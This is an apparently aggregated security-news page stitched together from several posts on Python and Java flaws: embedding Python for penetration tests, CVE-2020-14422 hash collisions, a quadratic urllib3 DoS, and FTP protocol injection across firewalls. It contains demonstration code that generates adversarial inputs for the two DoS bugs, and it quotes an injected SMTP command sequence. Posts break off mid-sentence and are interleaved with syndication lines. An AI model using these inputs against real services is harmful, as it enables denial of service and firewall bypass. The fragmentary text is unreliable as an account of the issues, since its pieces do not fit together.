When Python is not installed on the system, you can embed Python in a C# portable executable so that the user can still run Python code. We show, step by step, how to run Python on a Windows machine without installing it.
OS: Windows 10, x64 with Visual Studio 2015 installed
So we have seen how easy it is to run Python code without Python on the system, which has many uses in the phases of a penetration test.
The post Zero-day vulnerability in Python allows DOS attack: No patch available appeared first on Information Security Newspaper | Hacking News.
Below is a brief description of the reported vulnerability, together with its CVE identifier and its score on the Common Vulnerability Scoring System (CVSS) scale.
Tracked as CVE-2020-14422, the vulnerability exists because Python incorrectly computes hash values for the IPv4Interface and IPv6Interface classes in Lib/ipaddress.py, which allows remote attackers to mount denial-of-service (DoS) attacks.
According to pentesting specialists, an attacker can trigger the worst-case behaviour of a dictionary (or set) that stores IPv4Interface or IPv6Interface objects: because many distinct interface objects hash to the same value, an application that builds such a dictionary from attacker-supplied addresses spends far more CPU than expected on every insertion and lookup.
The vulnerability received a score of 6.3/10 on the CVSS scale, so it is considered a medium security flaw. The flaw resides in the following Python versions: 3.8.0, 3.8.1, 3.8.2, and 3.8.3.
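The collision itself, reconstructed as an added example that is not CPython’s code. Before the fix the interface classes hashed as ip XOR prefixlen XOR network_address (the corrected code hashes the tuple instead). Because the network address shares every bit with the interface address except the host part, the XOR cancels the network bits and every interface with the same host bits and prefix length collides, whatever network it sits in. The adversarial input below is constructed; the toy bucket table stands in for what a real dict’s probing degrades to.

```python
"""Demonstrate the pre-fix IPv4Interface hash collapsing onto one value."""
from __future__ import annotations
import ipaddress
from collections import defaultdict


def old_style_hash(interface: str) -> int:
    """Hash formula of the affected releases, as reconstructed here."""
    iface = ipaddress.ip_interface(interface)
    return int(iface.ip) ^ iface.network.prefixlen ^ int(iface.network.network_address)


def fixed_hash(interface: str) -> int:
    """Hash of the same object on a patched interpreter (tuple hash)."""
    return hash(ipaddress.ip_interface(interface))


def collision_groups(interfaces, hash_fn) -> dict[int, list[str]]:
    groups = defaultdict(list)
    for s in interfaces:
        groups[hash_fn(s)].append(s)
    return dict(groups)


def max_bucket(interfaces, hash_fn, buckets: int = 1024) -> int:
    """Largest chain in a toy hash table: the length every lookup must walk."""
    counts = [0] * buckets
    for s in interfaces:
        counts[hash_fn(s) % buckets] += 1
    return max(counts)


# Constructed adversarial input: 256 distinct /24 interfaces whose host bits are all .1
ATTACK_INPUT = [f"10.{i}.0.1/24" for i in range(256)]

if __name__ == "__main__":
    print("old hash of 10.0.0.1/24:", old_style_hash("10.0.0.1/24"))
    print("distinct old hashes:", len(collision_groups(ATTACK_INPUT, old_style_hash)))
    print("largest bucket, old:", max_bucket(ATTACK_INPUT, old_style_hash))
    print("distinct fixed hashes:", len(collision_groups(ATTACK_INPUT, fixed_hash)))
```

With host bits .1 and a /24, every such interface hashes to 1 XOR 24 = 25, so an attacker who can make the application key a dict by interfaces chooses inputs that all land in one chain; the 256 here can be scaled to as many as the input channel allows.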
Although the vulnerability can be exploited by unauthenticated remote attackers over the network, the pentesting experts have not yet detected cases of active exploitation, nor any malware variant linked to this attack. The bad news is that, at the time of writing, there is no patch that fully mitigates the risk.
The post Python applications and projects using Urllib3 have a vulnerability that allows DoS attacks appeared first on Information Security Newspaper | Hacking News.
It is worth noting that this library is used throughout the Python ecosystem: more than 200 packages depend on it directly, including the most popular ones such as requests, selenium and kubernetes. Given how widely it is used, most Python projects most likely use urllib3, directly or indirectly.
In the vulnerable version (introduced in 1.25.2), logic was added to util/url.py to percent-encode invalid characters in the request target. The method _encode_invalid_chars, as written, first collects every percent-encoding present in the component.
For a URL of a given length, the number of percent-encodings found grows linearly with that length, and the next step (normalizing each existing percent-encoded byte) also takes linear time per encoding, so the overall cost is quadratic. A threat actor can abuse this inefficiency to consume the processing resources of a target system, producing a DoS condition that persists for as long as such requests keep arriving.
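The quadratic shape and its linear replacement, as an added example that is not urllib3’s code: the vulnerable helper collected every percent-encoding and then, for each one, called str.replace() on the whole component, so k encodings in an n-character string meant k full scans; a request target made entirely of percent-encodings has k close to n/3. The linear form rewrites every match in a single pass. The work counters are instrumentation added here so the difference can be asserted rather than timed.

```python
"""Percent-encoding normalisation: per-match str.replace (quadratic) versus one re.sub pass."""
from __future__ import annotations
import re

PERCENT_RE = re.compile(r"%[a-fA-F0-9]{2}")


def normalise_quadratic(component: str) -> tuple[str, int]:
    """Old shape: one str.replace per match. Returns (result, characters scanned)."""
    scanned = 0
    for enc in PERCENT_RE.findall(component):
        if not enc.isupper():
            scanned += len(component)  # replace() walks the whole string every time
            component = component.replace(enc, enc.upper())
    return component, scanned


def normalise_linear(component: str) -> tuple[str, int]:
    """Fixed shape: a single pass, upper-casing each match in place."""
    return PERCENT_RE.sub(lambda m: m.group(0).upper(), component), len(component)


def hostile_target(n: int) -> str:
    """Constructed request target: n percent-encoded bytes and nothing else."""
    return "".join(f"%{i % 256:02x}" for i in range(n))


if __name__ == "__main__":
    target = hostile_target(1000)
    out_q, work_q = normalise_quadratic(target)
    out_l, work_l = normalise_linear(target)
    print("same output:", out_q == out_l, "scanned quadratic:", work_q, "linear:", work_l)
```

One thousand encodings already cost three million character visits against three thousand; a request line of a few hundred kilobytes, which most front ends accept, pushes the old code into seconds of CPU per request.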
The report was presented to the developers of the exposed library, who in turn recognized the presence of the flaw and rushed to release version 1.25.8, in which the DoS vulnerability has been fully mitigated.
As already mentioned, this is a widely used library, so the experts recommend that developers check whether their projects use a vulnerable version of urllib3. Because so many Python packages rely on urllib3, the vulnerability is likely to be present as an indirect dependency, in which case developers cannot simply update it themselves and must wait for, or override, the version pinned by the higher-level dependency.
The post These five programming languages have flaws that expose apps to attack appeared first on Information Security Newspaper | Hacking News.
The post Java and Python have unpatched firewall-crossing FTP SNAFU appeared first on Information Security Newspaper | Hacking News.
Stop us if you’ve heard this one: Java and Python have a bug you can exploit to cross firewalls. Since neither is yet patched, it might be a good day to nag your developers for a bit.
The Java vulnerability means protocol injection through its FTP implementation can fool a firewall into allowing TCP connections from the Internet to hosts on the inside.
Both are explained in more detail in two write-ups: one by Alexander Klink and one by Blindspot Security’s Timothy Morgan.
Klink’s discovery was that Java’s XML External Entity (XXE) handling mishandles FTP connections, because it does not validate the user name Java passes to the server.
Specifically, CR and LF characters should be rejected but aren’t, allowing non-FTP commands to be injected into a connection request. Klink’s demonstration showed how to send an SMTP e-mail from an FTP connection attempt (even though the FTP connection failed):
EHLO a<CR><LF>
MAIL FROM:<a@example.org><CR><LF>
RCPT TO:<alech@alech.de><CR><LF>
DATA<CR><LF>
From: a@example.org<LF>
To: alech@alech.de<LF>
Subject: test<LF>
<LF>
test!<LF><CR><LF>
.<CR><LF>
QUIT<CR><LF>
Klink concluded that “this attack is particularly interesting in a scenario where you can reach an (unrestricted, maybe not even spam- or malware-filtering) internal mail server from the machine doing the XML parsing.”
Morgan’s contribution was the realisation that the same behaviour can get an attacker through a firewall on its high ports (from 1024 to 65535), in a multi-stage process:
Morgan says he’s holding back publication of a proof-of-concept script until Oracle (and Python’s developers – more on this below) respond to the disclosure.
However, he envisages his exploit being used for MITM attacks, server-side request forgery, XXE attacks and more, and once past the firewall, desktop hosts can be attacked even if they don’t have Java installed.
Python, he writes, is similarly vulnerable through its urllib and urllib2 libraries, although “this injection appears to be limited to attacks via directory names specified in the URL”.
By way of mitigation, Morgan suggests disabling Java on desktops and in browsers; and disabling “classic mode” FTP on all firewalls.
Source: https://www.theregister.co.uk/